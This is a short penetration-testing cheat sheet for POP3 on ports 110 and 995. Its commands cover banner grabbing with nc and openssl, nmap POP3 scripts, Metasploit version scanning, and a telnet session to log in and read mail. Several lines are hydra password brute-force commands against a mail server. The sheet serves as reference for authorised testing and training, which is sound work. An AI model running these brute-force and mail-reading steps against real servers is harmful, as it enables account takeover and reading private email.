POP3 110,995

Post Office Protocol (POP) is a type of computer networking and Internet standard protocol that extracts and retrieves email from a remote mail server for access by the host machine. POP is an application layer protocol in the OSI model that provides end users the ability to fetch and receive email.

The POP clients generally connect, retrieve all messages, store them on the client system, and delete them from the server. There are 3 versions of POP, but POP3 is the most used one.

PORT STATE SERVICE

110/tcp open pop3

• Banner Grab 110

nc -nv {IP} 110

• Banner Grab 995, Grab Banner Secure

openssl s_client -connect {IP}:995 -crlf -quiet

• Nmap Scan for POP info

nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP}

• Brute Force

hydra -l {Username} -P {Big_Passwordlist} -f {IP} pop3 -V

hydra -l <USER> -P <PASSWORDS_LIST> -f <IP> pop3 -V

hydra -S -v -l <USER> -P <PASSWORDS_LIST> -s 995 -f <IP> pop3 -V

• Read mail

telnet <IP> 110

USER <USER> PASS <PASSWORD> LIST RETR <MAIL_NUMBER> QUIT

• POP3 enumeration without the need to run msfconsole

Note: sourced from https://github.com/carlospolop/legion

msfconsole -q -x 'use auxiliary/scanner/pop3/pop3_version; set RHOSTS {IP}; set RPORT 110; run; exit'